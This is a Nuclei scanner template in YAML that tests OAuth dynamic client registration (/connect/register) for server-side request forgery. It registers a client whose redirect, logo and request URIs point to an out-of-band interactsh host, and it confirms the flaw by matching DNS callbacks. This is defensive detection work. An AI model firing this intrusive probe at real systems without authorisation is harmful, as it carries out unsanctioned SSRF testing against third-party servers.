nuclei-templates/http/misconfiguration/ssrf-via-oauth-misconfig.yaml

39 lines
1.3 KiB
YAML

id: ssrf-via-oauth-misconfig
info:
name: SSRF due to misconfiguration in OAuth
author: KabirSuda
severity: medium
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
reference:
- https://portswigger.net/research/hidden-oauth-attack-vectors
metadata:
max-request: 1
tags: misconfig,oast,oauth,ssrf,intrusive
http:
- raw:
- |
POST /connect/register HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept-Language: en-US,en;q=0.9
{
"application_type": "web",
"redirect_uris": ["https://{{interactsh-url}}/callback"],
"client_name": "{{Hostname}}",
"logo_uri": "https://{{interactsh-url}}/favicon.ico",
"subject_type": "pairwise",
"token_endpoint_auth_method": "client_secret_basic",
"request_uris": ["https://{{interactsh-url}}"]
}
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
# digest: 4a0a0047304502203fcc2073e897e6aa2522f1dc38806fc2724d9858a7aeb6279d37b472ffcbddc30221008922df4d809dfc40f100f7cc349955f6d29a365d06e9f8741d833e27c4b66d69:922c64590222798bb761d5b6d8e72950